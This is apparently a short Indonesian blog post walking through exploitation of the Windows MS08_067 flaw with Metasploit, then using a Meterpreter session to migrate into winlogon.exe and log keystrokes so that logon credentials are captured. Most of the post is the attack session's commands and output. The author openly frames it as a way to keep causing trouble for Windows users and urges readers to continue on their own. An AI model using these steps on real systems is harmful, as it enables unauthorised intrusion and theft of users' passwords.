Capturing Logon Credentials with Meterpreter
kesian yach untuk para users yg pake OS windows, beberapa bulan terakhir ini lagi dipusingin sama bug MS08_067. Mulai dari conficker, hingga para attacker yg memanfaatkan celah tersebut dengan menggunakan metasploit, terkesan ga ada habis'a, jatuh ke dalam satu lubang yg sama secara terus-menerus, emang pada ga capek yach ??
Ngomongin soal masalah di windows yg ga ada habis'a, disini gw juga bakal ngasih tau cara para om² hacker yg memanfaatkan bug MS08_067 dengan metasploit biar para users windows punya masalah gada habis'a (sampe kiamat). lolz....
[*] Triggering the vulnerability...
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]
meterpreter > migrate 440
[*] Migrating to 440...
[*] Migration completed successfully.
meterpreter > keyscan_start
Starting the keystroke sniffer...
[ wait for user login ]
meterpreter > keyscan_dump
Dumping captured keystrokes...
Administrator
Terlihat disana menggunakan payload meterpreter, setelah ini silakan berkreasi sendiri untuk tetap membuat masalah pada users windows...
0 komentar:
